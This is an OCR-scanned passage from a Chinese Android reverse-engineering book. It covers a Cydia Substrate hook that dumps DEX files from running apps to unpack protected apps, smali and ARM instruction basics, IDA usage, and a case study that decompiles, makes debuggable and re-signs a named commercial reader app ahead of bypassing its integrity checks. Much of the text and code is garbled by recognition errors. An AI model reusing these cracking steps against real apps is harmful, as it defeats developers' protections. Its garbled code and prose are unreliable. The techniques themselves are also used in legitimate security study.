

LOGD("error find Z12dexFileParsePKhji"); 
leise 
MSHookFunction(dexload, (void*)&newDexFileParse, (void **)&oldDexFileParse); 


} 
yelseí 
LOGD("ERROR FIND LIBDVM"); 
} 
} 
这 里 找到 so 中 需要 hook 函 数 符号 ， 然 后 直接 调用 MSHookFunction 传 入 符号 ， 新 函数 地 址 ， 旧 函数 地 址 。 可 以 看 到 在 C 中 


中 针 是 多 么 强大 ， 实 现 了 锐 数 的 回调 机 制 ， 而 且 非 常 方 便 。 然 后 继续 来 看 新 定义 的 hook 逊 数 功 能 : 


DexFile* newDexFileParse(const ul* addr, size t len, int dvmdex) 


1 


char buf[200]; ° 


: Hy NEXU 
char pname|56 ; „= 


pid t pid = getpid(); 
getNameByPid(pid, pname); 剔除 无 效 进程 


if(exclude(pname)){ yd 


LOGI("exclude process:9s", pname); 
return oldDexFileParse(addr, len, dvmdex); 


} 


LOGD("call dvm dex pid:%d,pname:%s", pid, pname); 


sprintf(buf,"/sdcard/hookdex/%s_%d.dex", pname, pid); 
FILE* file = fopen(buf, "wb"); 
if(!file)( 


LOGD("error open sdcard file to write"); 


те1$е{ 
fwrite(addr, 1, len, file); 
fclose(file); 
LOGD("write dex:%s len-9*d succ!", buf, len); 


/ ГАТА, КЕД {Ж FOE £1 eq 
return oldDexFileParse(addr,len,dvmdex); 保存 de 文件 
品 X | 


j 
XERRA, AAJ dexxr (F, fzdexxtt, me ERRIRE, MBERE ААУ 


程 。 还 要 记得 过 滤 规 则 ， 不 要 对 每 个 进程 都 进行 操作 ， 并 不 是 每 个 进程 都 是 有 效 的 。 而 这 些 过 滤 规 则 是 根据 目 己 打印 进程 名 来 目 
行 添加 即 可 。 


第 五 步 : 编写 MK 文件 


上 面 代码 已 经 编写 完成 了 ， 下 面 来 编写 编译 脚本 吧 。 注 意 编译 之 后 的 文件 名 一 定 要 以 cy 结尾 ， 不 然 是 hook 是 失败 的 ， 然 后 
就 是 需要 导入 substrate 的 So 库 文 件 : 


jinclude $(CLEAR VARS) 
LOCAL MODULE := substrate 
LOCAL, SRC, FILES :- libsubstrate.so 


< JIA substrate 的 so Ж 


include $(CLEAR VARS) 


LOCAL MODULE := substrate-dvm 
LOCAL SRC FILES :- libsubstrate-dvm.so 
include $(PREBUILT SHARED LIBRARY) 


Jinclude $(CLEAR VARS) 
1 ## 注 里 一 定 要 注意 编译 的 文件 名 必须 是 cy 结尾 的 | 这 里 要 注音 后 级 名 


5 LOCAL MODULE 

;LOCAL SRC FILES : 必须 是 cy 结尾 的 
/LOCAL LDLIBS := -llog 

3 LOCAL. ARM MODE := arm 

JLOCAL, LDLIBS += -L$(LOCAL PATH) -lsubstrate-dvm -lsubstrate 


)include $(BUILD SHARED LIBRARY) 


和 之 前 一 样 ， 运 行 之 后 ， 需 要 重启 设备 ， 然 后 先 看 看 native 层 的 log 信 息 : 


С 24?3›: exclude process:re-initialized> 
< 24095: Substrate initialized. 

< 24095: create dir succ... 

< 24095: exclude process:app. process 

С 2489»: exclude process-:app. process 

< 24095: exclude process:app process 

< 2489»: exclude process-:app. process 

С 2489»: exclude process-:app. process 

< 2489»: exclude process-:app. process 

С 2489»: exclude process-:app. process 

< 24095: exclude process:app process 

< 2489»: exclude process-:app. process P n ЗИ: ВЕЕ 
< 2489»: exclude process:app_process 

< 2489»: exclude process:app_process 

< 24095: exclude process:app. process 

< 24095: exclude process:app process 

С 2489»: exclude process-:app. process 

< 2489»: exclude process-:app. process 


24089»: exclude process:app. process 
2409»: exclude process:app. process 
23495: exclude process:app. process d 
Jj dex 
2349»: exclude process:app. process 保生 的 文件 


2516›: exclude process:re-initialized» 

2516»: call dum dex pid:2516,pname:d.sogou:classic 

exclude process-:app. process 

2409»: exclude process:app process 

rite dex:/sdcard/hookdex/d.sogou:classic 2516.dex len-3986384 succ 
all dum dex pid:2516,pname:d.sogou:classic 


N A ñA ñ Añ A A AA A A M ) 
N 
+ 
° 
© 
` 
.. 


rite dex:/sdcard/hookdex/d.sogou:classic 2516.dex len-3472 succ? 


然后 再 去 目录 中 查看 保存 的 dex 文 件 信 息 ， 如 图 19-7 所 示 。 


ыза тыйы бы ы” ый à 1 | SS ты} sai i Ыы amaka da Í з! "hi? š ый ыи 
20 BH 17 11:04:45 3.39K гига 


d.sogou;classic 2515 dex 


2568 17 12:24:19 3.39X MT 


d.sogou;classic dd 1518,dex 


20 BH 17 05:40:55 3.39€. га-га 


d.sogou;classic  /a4B.dex 


мА 17 0968-20 3.39X nw-rw— 


d.sogou;classic D524.dex 


20 SF] 17 11:31:51 3.33X. rw-rw— 


encent.mm.:tools. 18370.dex 
AMIÉR 17 РАКІ ПАПАН rer 


encent.rmm:-tools 6184. dex 


20 6H 17 11:10:09. 6.9318. rwrw 一 


ent.mm:exdevice 18596. dex 


MEA 17 11:04:19 BAME rwzw— 


ent.mm:exdevice 19597] дех 


pe m eum 


nnLnrnLrLnLrLrLrLnrL 


419-7 dexx fF 


dex 文 件 都 保存 成 功 了 ， 这 样 会 友 现 如 果 对 于 早期 的 加 壹 应 用 ， 可 以 及 用 这 种 方式 进行 脱 壳 操作 。 也 不 需要 用 |DA 进 行 调试 
dump 出 dex 文 件 了 。 


194 ЖЕЕ 55177 


х-Ғ№айуе&Ноок 555 f , ОСА ЛЛА: 


: Hook Z Ао RKE XHook е 9 3⁄2 Z AR, АЗА ЈА Е Д, iX4MfeHook Java 层 一 样 ， 必 须 先 找到 突破 点 才能 


: Hook 可 能 会 有 一 些 错误 ， 因 为 native 层 比 java 层 错误 信息 难 发 现 ， 所 以 最 好 是 在 茶 些 地 方 加 一 些 日 志 观 察 结 果 。 
如 果 在 使 用 过 程 中 发 现 Hook 失 败 ， 注 意 检 查 如 下 个 条 件 : 

XMIL 中 是 否 配 置 了 权限 和 入 口 。 

` 编译 脚本 MK 中 的 后 级 名 是 否 为 cy。 


项 目下 载 地 址 : https:/ /github.com/fourbrother/CydiaSubstrateHook 


19.5 ”本章 小 结 


本 草 主要 从 Hook Java 层 和 Native 层 两 个 方面 介绍 了 Cydia Substtate 框 架 ， 关 于 Hook Java 层 功能 Xposed 框 架 也 可 以 做 到 ， 但 是 对 


于 Native 层 功能 的 Hook 操 作 ， 还 是 Cydia Substrate 框 架 比 较 好 用 ， 有 了 这 个 框架 再 也 不 展 惧 Hook 了 ，Native 层 代码 也 可 以 一 览 无 


页 


20.1 smalij£; 
smali、baksmali 分 别 是 指 安 提 系统 里 的 Java 虚 拟 机 (Dalvik) 所 使 用 的 一 种 ，dex 格 式 文 件 的 汇编 器 、 反 汇编 器 ， 其 语法 
是 一 种 宽松 式 的 Jasmin/dedexer 语 法 ， 而 且 实 现 了 .dex 格 式 所 有 功能 (注解 、 调 斌 信息、 线路 信息 等 ) 。 


当 对 apk 文 件 进 行 反 编 译 后 ， 便 会 生成 此 类 的 文件 ， 其 中 在 Davlik 字 节 码 中 ， 寄 存 器 都 是 32 位 的 ， 能 够 支持 任何 类 型 ，64 位 


ЕЕ: 


类 型 (Long/Double) FH2^^grfzs&x*m; Dalvik 字 节 码 有 两 种 类 型 : 原始 类 型 、 引 用 类 型 (包括 对 象 和 数组 ) 。 
1.smali 指 令 

部 分 smali 指 令 如 下 : 

field private isFlag: 2 定义 变量 

.method 方法 

parameter 方法 参数 

.prologue “方法 开始 

line 12 此 方法 位 于 第 12 行 

invoke-super 调用 父 函 数 


const/high16 v0, 0x7fo3 ”把 0x7fo3 赋 值 给 v0 


invoke-direct 调用 函数 

return-void ”函数 返回 void 

.end method ”函数 结束 

new-instance 创建 实例 

iput-object ”对 象 赋值 

iget-object 调用 对 象 

invoke-static 调用 静态 函数 

条 件 跳 转 分 支 指 令 如 下 : 

"if-eq vA, vB, : cond **" 如 果 vA 等 于 vB 则 跳 转 到 : cond ** 
"if-ne vA, vB, : cond *" 如 果 VA 不 等 于 vB 则 跳 转 到 : cond ** 
"if-It vA, vB, : cond **" 如 果 VvA 小 于 vB 则 跳 转 到 : cond ** 
"if-ge vA, vB, : cond **" 如 果 vA 大 于 等 于 vB 则 跳 转 到 : cond ** 
"if-gt vA, vB, : cond_**" 如 果 vA 大 于 vB 则 跳 转 到 : cond ** 
"if-le vA, vB, : cond **" 如 果 vA 小 于 等 于 vB 则 跳 转 到 : cond ** 
"if-eqz УА, : cond **" 如 果 vA 等 于 0 则 跳 转 到 : cond ** 
"if-nez vA, : cond **" 如 果 vA 不 等 于 0 则 跳 转 到 : cond ** 
"if-ItzvA, : cond **" 如 果 VvA 小 于 0 则 跳 转 到 : cond ** 

"if-gez vA, : cond **" 如 果 vA 大 于 等 于 0 则 跳 转 到 : cond ** 
"if-gtz vA, : cond **" 如 果 vA 大 于 0 则 跳 转 到 : cond ** 


"if-lez vA, : cond **" 如 果 vA 小 于 等 于 0 则 跳 转 到 : cond ** 


2.smali 语 法 案例 分 析 


下 面 是 一 个 们 蛙 万 法 : 


private boolean ifSense()t 
boolean tempFlag = ((3-2)==1)? true : false; 
if (tempFlag) { 
return true; 
}elsel 
return false; 


上 面 代 码 反 编译 之 后 对 应 的 smali 语 法 如 下 : 


.method private ifSense()Z 
.locals 2 


.prologue 
line 22 
const/4 v0, 0х1 / / vO 赋值 为 1 


.line 24 
.local v0, tempFlag:Z 
if-egz v0, :cond 0 // 判断 v0 是 否 等 于 0， 不 符合 条 件 向 下 走 ， 符合 条 件 执行 сопа 0 分 支 


„11пе 25 
const 74 у1, 0х1 // 符合 条 件 分 支 


.line 27 
СОСО: Ü 
return vl 


:сопа 0 
const/4 vl, 0х0 // cond. 0 分 支 


goto :goto. 0 
.end method 


如 果 符 合 if 分 支 则 程序 往 下 走 ， 最 终 return; 而 如 果 条 件 不 符合 则 会 走 到 : cond 0 分 文 ， 最 终 执 行 goto: goto_0 走 回 到 : 
goto Ojx[n], 


20.2 ”手动 注入 smali 如 名 


有 时 候 破 解 应 用 时 ， 需 要 通过 全 局 搜索 一 些 天 键 的 字符 串 来 找 突破 点 ， 但 是 这 招 有 时 候 不 好 使 ， 所 以 这 时 需要 加 一 些 代码 来 
观察 信息 了 ， 这 里 有 一 个 通用 的 方法 融 是 加 入 目 己 的 log 代 码 ， 来 追 蹊 代 码 的 执行 逻辑 ， 因 为 这 里 讲 的 是 静态 分 析 抠 术 ， 所 以 残 
用 代码 注入 技术 来 跟 中 执行 逻 辑 ， 后 面 介绍 了 动态 分 析 技 术 之 后 ， 那 束 简 单 了 ， 可 以 随意 打 断 点 来 进行 调试 。 这 里 的 添加 代码 ， 
就 是 修改 smali 人 代码， 添加 日 志 信 息 即 可 ， 下 面 会 用 例子 来 进行 讲解 ， 这 也 是 最 弟 用 的 一 种 技术 。 


20.3 ARM 指令 


逆 加 者 必须 能 看 懂 汇 编 代 码 ， 融 类 似 于 在 调 试 Java 层 代码 的 时 候 一 样 ， 必 须 会 smali 语 法 。 庆 笠 的 是 ， 这 两 种 语法 都 不 是 很 
复杂 ， 知 道 一 些 大 体 的 语法 和 指令 融 可 以 了 ， 下 面 来 看 看 ARM 指 令 中 的 寻 址 方式、 寄存 器 、 弟 用 指令 ， 了 解 这 三 个 知识 点 ， 融 


会 对 ARM 指 令 有 一 个 大 体 的 了 解 。 
1.ARM 指 令 中 的 寻 址 方式 


立即 数 寻 址 


立即 数 寻 址 也 册立 即 寻 址 ， 是 一 种 特殊 的 寻 址 万 式 。 操 作 数 本 身 包含 在 指令 中 ， 只 要 取出 指令 也 束 取 到 了 操作 数 。 这 个 操作 
数 叫 做 立即 数 ， 对 应 的 寻 址 方式 叫 作 立即 寻 址 。 例 如 : 


MOV КО, #64; RO — 64 


. 寄存 器 寻 址 
寄存 嚣 寻 址 是 利用 寄存 器 中 的 数值 作为 操作 数 ， 也 称 为 寄存 器 直接 寻 址 。 例 如 : 


ADD R0, R1, R2 ; КО << КІ + R2 


. 寄存 器 间接 寻 址 


寄存 器 间接 寻 址 就 是 把 寄存 器 中 的 值 作为 地 址 ， 再 通过 这 个 地 址 去 取得 操作 数 ， 操 作 数 本 身 存放 在 存储 器 中 。 例 如 : 


LDR RO, [R1] “ КО *— [R1] 


‚ 寄存 器 偏 移 寻 址 


这 是 ARM 指 令 集 特 有 的 寻 址 方式 ， 它 是 在 寄 仔 器 寻 址 得 到 操作 数 后 再 进行 移 位 操作 ， 得 到 最 终 的 操作 数 。 例 如 : 


MOV R0, R2, LSL #3 : RO — R2 * 8 , R2 {5% 314, ARRA R 
- 寄存 器 基 址 变 址 寻 址 


寄存 器 基 址 变 址 寻 址 义 称 为 基 址 变 址 寻 址 ， 是 在 寄存 器 间接 寻 址 的 基础 上 扩展 来 的 。 它 将 寄存 器 (该 寄存 器 一 般 称 作 基 址 寄 
存 器 ) 中 的 值 与 指令 中 给 出 的 地 址 偏 移 量 相 加 ， 从 而 得 到 一 个 地 址 ， 通 过 这 个 地 址 取得 操作 数 。 例 如 : 


LDR RO, [R1, #4]; RO —[R1 + 4], 将 R1 的 内 容 加 上 4 形成 操作 数 地 址 ， 取 得 的 操作 数 存 入 寄存 器 RO 中 。 


- 多 寄存 器 寻 址 
这 种 寻 址 方式 可 以 一 次 完成 多 个 寄存 器 值 的 传送 。 例 如 : 


LDMIA RO, (R1, R2, R3, R4) ; R1*—- [RO], R2 *— [R0+4], R3 < [R0+8], R4 < [К0+12] 


- HIT hE 
itke — АМА, omad (First In Last Out, FILO) 的 方式 工作 ， 使 用 堆栈 指针 (Stack Pointer, SP) 指示 当 


БИНУРА ЕМ Еа, ERETOJ. HRD: 


STMFD SP! , {R1 —R7, ІК) (| £ R1 ~ R7, в Ж АЖ, Ж% л 


LDMED SP! ,1R1—R7, LR | ; 将 堆栈 中 的 数据 取 回 到 R1 ~ R7, 


2.ARM 中 的 寄存 器 


RO-R3: 用 于 遂 数 参数 及 返回 值 的 传递 。 


R4-R6, R8, R10-R11: 没有 特殊 规定 ， 束 是 普通 的 通用 寄存 器 。 


R7: 栈 帧 指针 (Frame Pointer) ， 指 向 前 一 个 保存 的 栈 帧 (stack frame) 和 链接 寄 仔 器 (link register, Ir) 在 栈 上 的 地 


址 。 

R9: 操作 系统 保留 。 

R12: 又 叫 IP (intra-procedure scratch) 。 

R13: 又 叫 SP (stack pointer) ， 是 栈 顶 措 针 。 

R14: 又 叫 LR (link register) ， 存 放 函 数 的 返回 地 址 。 

R15: 又 叫 PC (program counter) ， 措 同 当前 指令 地 址 。 
3.ARM 中 的 常用 指令 合 义 

ADD: 加 指令 

SUB: 58%. 

STR: 把 寄存 器 内 容 存 到 栈 上 去 。 


LDR: 把 栈 上 内 容 载 入 一 寄 仓 器 中 。 


W: 是 一 个 可 选 的 指令 宽度 说 明 符 。 它 不 会 影响 为 此 指令 的 行为 ， 它 只 是 确保 生成 32 位 指 


BL: 执行 函数 调用 ， 并 把 使 lr 指向 调用 者 (caller) 的 下 一 条 指令 ， 即 函数 的 返回 地 址 。 
BLX: 同上 ,但 是 在 ARM 和 thumb 指 令 集 间 切换 。 
CMP: 指令 进行 比较 两 个 操作 数 的 大 小 。 
4.ARM 指 令 简单 代码 段 分 析 
代码 : 


#finclude <stdio.h> 


令 。|Infocenter.arm.com 的 详细 


int Tunctint a. int b, inb c, inb d, їз е, п T) 


{ 


іпсао=а+р+с+а +е + f; 


return g; 


对 应 的 ARM 指 令 


add r0, rl; 将 参数 а 和 参数 р 相 加 再 把 结果 赋值 给 工 0 

ldr.w r12, [sp]; 把 最 后 的 一 个 参数 f МВ ЕЖ | r12 寄存 器 
add r0, r2; ес c Z malro 上 

ldr.w r9, [sp, ; 把 参数 e Ad EAE го 寄存 器 

add r0, r3; Ria жа ro 

add r0, r12; #Ju# x f F| ro 

add го, r9; #Ju# x e 8| ro 
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IDA 工 具 太 强大 了 ， 它 可 以 查看 so 中 的 代码 逻辑 。 如 图 20-1 所 示 。 


一 Edit — Search View Debugger Options Windows Help 
вЫ e += > "Um & y a ӘӘ Уу # uá X > О О (№ debugger "| *e(d): amat Е 20.6% 


Library function Data Regular function B Unexplored Ё Instruction External symbol 


[F] Functions window п 8x | IDA View-A Ü [©] Hex View-A (3 | [А] Structures [Ü | 图 Enums x | 8] Imports x | B] Exports O 
— ^ .text:00001230 uar 98 -0x98 ^ 
— .text:00001230 s * -0x68 
ш memcpy Г .text:00001230 uar_10 = -0x10 
7] strcat .text:00001230 uar C = -0xC = 
(f| android log print | .text:00001230 TER 
F] memset 一 ”|.text:00001230 STMFD SP*, (RH ,R11,LR) 
[7| strlen [ ° |, text:00001234 арр R11, SP, #8 
(7 sprintf ° |. text :00001238 SUB SP, SP, #0xE4 
= ; * |. text :0000123C STR RO, [R11,#uar_E0] 
Has sa а exidx . = |. text :00001240 STR R1, [Rili,Huar E4] 
ur = > ”|.text:00001244 STR R2, [R11,#uar_E8] 
A | * |. text :00001248 LDR R4, -( GLOBAL OFFSET TABLE - 0x1255) 
dj —cxa begin cleanup ° |. text :0000124C аро R4, PC, ВЧ ; _GLOBAL_OFFSET_TABLE_ 
££. cxa type match * |. text :00001250 LDR ВЗ, -(. stack, chk, guard ptr - Ox5FBC) 
因 sub EFC ° |. text : 00001254 LDR R3, [R4,R3] ; |. stack, chk, guard 
A Jetring2CStr = |. text : 00001258 LDR R3, [R3] 
[7] check ° |. text :0000125C STR R3, [R11,Huar. 19] 
[7] Java com shuqi application PasswordProcess getDbAE < |. text :00001260 LDR RO, [R11,#uar_E0] 
F] Java com shuqi application PasswordProcess getLgPa: ° |: text :00001264 BL check 
[7] Java_com_shuqi_application_PasswordProcess_getDbPa š . text :00001268 MOU R3, RO 
701 MDSInit .text:0000126C CHP R3, HO 
F MD5Update г: |.text:00001270 BNE loc, 129C 
= р |^ |.text:00001275 LDR R3, [Ril,Huar, E0] 
А MDSFinal ' ° | text:00001278 LDR R3, [R3] 
[F] sub ТАРО 9 |. text:0000127C LDR R2, [R3,80x29C] 
[7] sub 319C |^ |. text:00001280 LDR RO, [Riil,Huar, EO] 
[7] sub 32B4 |^ |.text:00001285 LDR R3, -(unk, 4920 - 0x1290) 
[7] sub 3390 |^ |. text:00001288 арр R3, PC, R3 ; unk, 4920 
因 sub 33FC Ё |^ |. text :0000128C MOU R1, R3 
= | |^ |.text:00001290 BLX R2 
4 <Í ШП | ^ 
Line 19 of 87 4 100001270 00001270: Java com shuqi application PasswordProcess getLgPassword-*40 - 


Е Output window 


Executing function - 'OnLoad'. 
IDA is analysing the input file. «5 

You may start to explore the input file right now. 

Python 2.7.2 (default, Jun 12 2011, 15:08:59) [MSC u.1500 32 bit (Intel)] 

IDAPython u1.6.0 final (serial 0) (c) The IDAüPython Team «idapython(Ggooglegroups.coi»? 


--—-- qe, 一 


Using FLIRT signature: ARM library little endian 
Propagating type information... 

Function argument information has been propagated 
The initial autoanalysis has been finished. 


AU: idle Down Disk: 153GB 


“үш 


图 20-1 IDA 打 开 so 文件 内 容 


可 以 看 到 左边 栏 中 有 so 中 的 函数 ， 找 到 指定 冰 数 的 定义 的 地 方 进行 查看 即 可 。1DA 也 是 可 以 直接 查看 apk 文 件 的 ， 如 图 20-2 
Рх. 


可 以 查看 apk 文 件 中 的 所 有 文件 。 可 以 选择 classes.dex 文 件 ， 如 图 20-3 所 示 。 


这 里 可 能 会 遇 到 一 个 问题 ， 融 是 如 果 应 用 程序 太 大 ， 打 开 过 程 中 会 很 慢 ， 有 可 能 IDA 停 止 工作 ， 所 以 要 慢 慢 等 ， 如 图 20-4 所 


[ДҮ 


19 Archive: C:\UsersViangwei\Desktop\ 静 态 分 析 \apktool_2.0.0rc4A\AndroidDemo.apk Type: ZIP 


File name Method 


| AndroidManifest.xml DEFLATED 
res/drawable-hdpi-v4/ic launcherpng STORED 
res/drawable-mdpi-v4/ic launcher.png STORED 
res/drawable-xhdpi-v4/ic launcher.png STORED 
res/drawable-xxhdpi-v4/ic launcher.png STORED 
res/layout/activity main.xml DEFLATED 
resources.arsc STORED 
Classes.dex DEFLATED 
META-INF/MANIFEST.MF DEFLATED 
META-INF/CERT.SF DEFLATED 
META-INF/CERT.RSA DEFLATED 


Line 1 of 11 


图 20-2 IDA & Жарк x 44 


| File Fdit Jump Search View Options Windows Help 
БЫ € Y > v: 306 & M ху: [A @ ` = m їй” + w QF ш Хх. »udg 


P Please wait... 


Loading file into the database. 


Drag a file here to disassemble it 


[=] Output window 


Th гыт Me MNW EA FEN Te YEI w K API í i TT Li = 


(хаб )ҳІ0А 6.5XloadersMdex. 19ы) 


Loading file 'C:XUsersXjiangweixXDesktopXg$ 2:27 TT Xandroid р Sm EE NRndroid Z Sg EE 三 


Xdex2jar-80.0.9.15123.dex' into database... 
Detected file format: Android DEX file version 53.0 


@-00000000 Down 


图 20-3 ”查看 classes.dex 文 件 


Y IDA - classes.dex c s - 
File Edit Jump Search View Options Windows Help 
вЫ o € və >i hA Š 3 uo ШӘ duugtsv1kéuWX »0po( X J-*($ WB 20.6% 
ШЕЕ lu MM wawa o? ų 
:| Library function Data Regular function B Unexplored Instruction External symbol 


[f] Functions window m c) e | IDA View-A D (2 Hex View O Structures [D га Imports EJ 8 Exports EJ 
Function name T CODE : 00000582 .Short 0 # Number of try items : 0x0 
тр. = | |+ ICODE:00000584 .int byte 9F6 H Debug info 
f] BuildConfig init (V | 1° |CODE 00000588 .int 6 Н Size of bytecode (in 16-bit units): 0x6 
F R$attr init (V |^ СОЕ :0000058С # Source file: MyLog. java 
A R$dimen init GV |» CODE:0000058C public static void com.shugi.application.MuLog.print() 
A R$drawable init (QV - ?* CODE:0000058C .prologue, end # CODE XREF: My&ctiuity onCreateQUL*6f j 
A R$layout init (QV ; CODE:0000058C Ліпе 14 
A R$string. init GV ' CODE : 0000058C | | 
ТВ init GV , CODE:0000058C const-string vO, aDebug, ,. H "debug..." 
ERAE.N 。 。 *- CODE:00000590 inuoke-static (v0), «void MyLog.log(ref) MuLog logGUL» 
[f] MyActivity init (V CODE : 00900596 
2 MyActivity onCreate VL CODE:09990596 locret: 
41 MyLog. init V ° CODE : 00000596 Ліпе 15 
Я Mylog_log@VL CODE : 00000596 
MyLog print(V CODE : 00000596 return-uoid 
CODE:00000596 Method End E 
CODE: 0080885906 Ho = dy 
CODE : 00000598 # Annotation directory 
CODE : 00000598 # Annotation directory item [0] 
° CODE : 00000598 off, 598: .int dword_404 н DATA XREF: CLASS, DEF:000900318T0 
CODE : 00000598 # MAP :00000B5C1o 
CODE : 00000598 # Offset to class annotations 
° |CODE:0000059C .int 0 # Count of annotated fields 
° CODE : 000005A0 .int 0 # Count of annotated methods 
° |CODE: 000005A4 .int 0 H Count of annotated parameters 
CODE:00000588 # Annotation directory item [1] 
° |CODE:000005808 off. 508: .int dword 410 # DATA XREF: CLASS DEF:0090033810 
CODE : 000005A8 # Offset to class annotations 
° CODE : 000005ñC .int 0 # Count of annotated fields 
« [m] ч ° |CODE:000005BO .int 0 # Count of annotated methods 
Line 12 of 12 0000058D 0000058C: MyLog_print@V — 


El Output window 


Compiling file ‘C:\Program Files (x86)XIDA 6.5XidcXida.idc'... ^ 
Executing function 'main'... 

Compiling file ‘C:\Program Files (x86)\IDA 6.5XidcXonload.idc'... 

Executing function 'OnLoad'... 

IDA is analysing the input file... 

Vou may start to explore the input file right пои. 


Python 2.7.2 (default, Jun 12 2011, 15:08:59) [MSC u.1500 32 bit (Intel)] 
IDAPython u1.6.0 final (serial 0) (c) The IDAPython Team «idapythonG8googlegroups.com» 


The initial autoanalysis has been finished. 


AU: idle Down Disk: 152GB 


‹ Еш 


9120-4 ”查看 classes.dex 文 件 


打开 之 后 ， 可 以 看 到 类 和 万 法 名 ， 这 里 还 可 以 支持 搜索 类 名 和 万 法 名 Ctrl+F， 也 可 以 查看 字符 串 内 容 (Shirt+F12) ， 如 图 
20-5 所 示 。 


20.5.1 


Functions window 


Address 


t$] STRINGS:0000... 
t$ STRINGS:0000... 
STRINGS:0000... 
t$] STRINGS:0000... 
STRINGS:0000... 
STRINGS:0000... 
t$ STRINGS:0000... 
STRINGS:0000... 
STRINGS:0000... 
t$] STRINGS:0000... 
STRINGS:0000... 
t$ STRINGS:0000... 
STRINGS:0000... 
SIRINGS:0000... 
t$] STRINGS:0000... 
SIRINGS:0000... 
m SIRINGS:0000... 
SIRINGS:0000... 
SIRINGS:0000... 
t$] STRINGS:0000... 
SIRINGS:0000... 
t$] STRINGS:0000... 
t$] STRINGS:0000... 
STRINGS:0000... 
STRINGS:0000... 


Length 


0000000B 
00000007 
0000000C 
00000010 
00000016 
0000000 
00000019 
00000009 
0000000 / 
00000005 
00000009 
00000006 
00000009 
0000000C 
0000000C 
00000007 
00000005 
00000005 
00000009 
00000006 
00000013 
0000000 / 
00000005 
00000009 
00000006 


| ry ry ry ry ry аа Теа rs ee rs rs r r r; rx ry r; r" 


Strings window EJ 


lype String 


MyLog.java 

Rjava 

accessFlags 

action settings 
activity horizontal margin 
activity main 
activity vertical margin 
app name 

append 

attr 

debug... 

dimen 

drawable 

hello world 

ic launcher 

layout 

msg: 

name 

onCreate 

print 
savedlnstanceState 
string 

this 

toString 

value 


图 20-5 查看 字符 串 内 容 


久 现 IDA 也 是 一 个 分 析 Java 代 码 的 好 手 ， 所 以 况 这 个 工具 太 强 大 了 。 


20.5 “案例 分 析 


本 节 通 过 一 个 例子 来 看 看 如 何 使 用 静态 分 析 技 术 进 行 破解 。 


静态 分 析 smali 代 和 码 


首先 拿 到 需要 破解 的 apk， 使 用 apktool,jar 工 具 来 反 编 译 : 


java -jar apktool.jar d xxx.apk 

C:NUsersNjiangweil-gMDesktopMAndroid 中 的 动态 调试 >java -jar apktool.jar d sq.apk 
-о Sq 

Using Apktool 2.0.0-RCA on sq.apk 

Loading resource table... 

Decoding AndroidManifest.xml with resources... 

Loading resource table from file: C:NUsersNjiangweil-gNapktoolNframework*1. 
apk 

Regular manifest package... 

Decoding file-resources... 

Decoding values */* XMLs... 

Baksmaling classes.dex. 


H F FH ER 


Adi a Bs. 


testI: Baksmaling classes2.dex... 
testI: Copying assets and libs... 
I: Copying unknown files... 
I: Copying original files... 


C:NUsersNjiangweil-gMDesktop M Android 中 的 动态 调试 > 


这 个 apk 很 容易 束 被 反 编译 了 ， 看 来 并 没有 进行 任何 的 加 固 ， 那 束 好 办 了 。 这 里 改 一 下 它 的 AndroidManifest.xml 中 的 信 
息 ， 改 成 可 调式 模式 ， 这 是 后 面 进行 动态 调试 的 基础 ， 当 然 也 可 以 不 用 修改 ， 在 之 前 章节 介绍 了 如 何 修 改 系统 的 调试 总 开关 ， 如 
果 把 系统 的 调试 总 开关 打开 ， 这 里 就 不 用 修改 了 。 一 个 正式 的 apk 在 AndroidManifest.xml 中 这 个 值 是 false 的 。 看 看 它 的 
AndroidManifest.xml 文 件 ， 如 下 所 示 : 
&application android:theme="@android:style/Theme.NoTitleBar" 


android:label="@string/app_name" android:icon-"gdrawable/icon" 
andraid:name-"com. shudi application. ShuqiApplication" 


{activity android: Eme "Bandroid: style/Theme.Translucent.NoTitleBar" i 
android:screenOrientation-"portrait" android:configChanges-"keyboardHi: 


把 这 个 值 改 成 true， 再 回 编译 ， 这 时 候 殉 可 以 动态 调试 apk 了 。 所 以 在 这 点 上 可 以 看 到 ， 静 态 分 析 是 动态 分 析 的 前 提 ， 这 
值 不 修改 的 话 ， 是 没有 办 法 进行 后 续 的 动态 调试 的 。 修 改 成 功 之 后 ， 进 行 回 编译 : 


са C:\Users\jiangwei\Desktop\ 静态 分 析 Napktool_2.0.0rc4 

del debug.sig.apk 

java -jar apktool.jar b -d 123 -o debug.apk 

java -jar .Nsign'Msignapk.jar .NsignNtestkey.x509.pem .MsignNtestkey.pk8 debug. 
apk debug.sig.apk 

del debug.apk 

аар uninstall com.shugi.controller 

adb install debug.sig.apk 

adb shell am start -n com.shugi.controller/.Loading 

pause 


这 里 是 为 了 简化 内 容 ， 写 了 一 个 批 处 理 ， 首 先进 入 到 目录 ， 然 后 使 用 命令 进行 回 编译 : 

java -jar apktool.jar b -d sq -o debug.apk 

sq 是 之 前 反 编 译 的 目录 ，debug.apk 是 回 编译 之 后 的 文件 ， 这 时 ，debug.apk 是 不 能 安装 运行 的 ， 因 为 没有 签名 ，Android 
中 是 不 允许 安 六 一 个 没有 签名 的 apk。 


下 面 还 要 继续 签名 ， 用 系统 自 市 的 签名 文件 即 可 签名 : 


java -jar .Nsign'Nsignapk.jar .\sign\testkey.x509.pem .\sign\testkey.pk8 debug. 
apk debug.sig.apk 


后 面 就 直接 安装 这 个 apk， 然 后 运行 apk。 这 个 过 程 中 只 需要 知道 应 用 的 包 名 和 入 口 Activity 名 称 即 可 ， 这 个 信息 在 
AndroidManifest.xml 中 也 是 可 以 获取 到 的 ， 当 然 可 以 使 用 如 下 命令 得 到 : 


аар shell dumpsys activity top 


C:\Users\jiangweil-g\Desktop\Android 中 的 动态 调试 >adb shell dumpsys activity top 
TASK com.shuqi.controller id=139 
ACTIVITY com.shuqi.controller/com.shugi.activity.MainActivity 437d0fc8 


Bidesl7423 
Local Activity 42df0130 State: 
mResumed-true mStopped-false mFinished-false 包 名 + ЛП Activity 
mLoadersStarted-true 
mChangingConfigurations-false 


回 编译 之 后 ， 运 行程 序 ， 友 现 有 问题 ， 即 点 击 程序 的 icon 没 反应 ， 运 行 不 起 来 。 查 看 log 中 的 异常 信 息 ， 友 现 也 没有 抛 出 任 
何 异常 ， 那 么 这 时 束 可 以 判断 ， 它 内 部 肯定 做 了 什么 校 验 工作 。 校 验 万 式 一 般 有 两 种 : 


: 对 dex 做 校 验 ， 防 止 修改 dex。 
‚ 对 apk 的 签名 做 校 验 ， 防 止 重 新 打包 。 


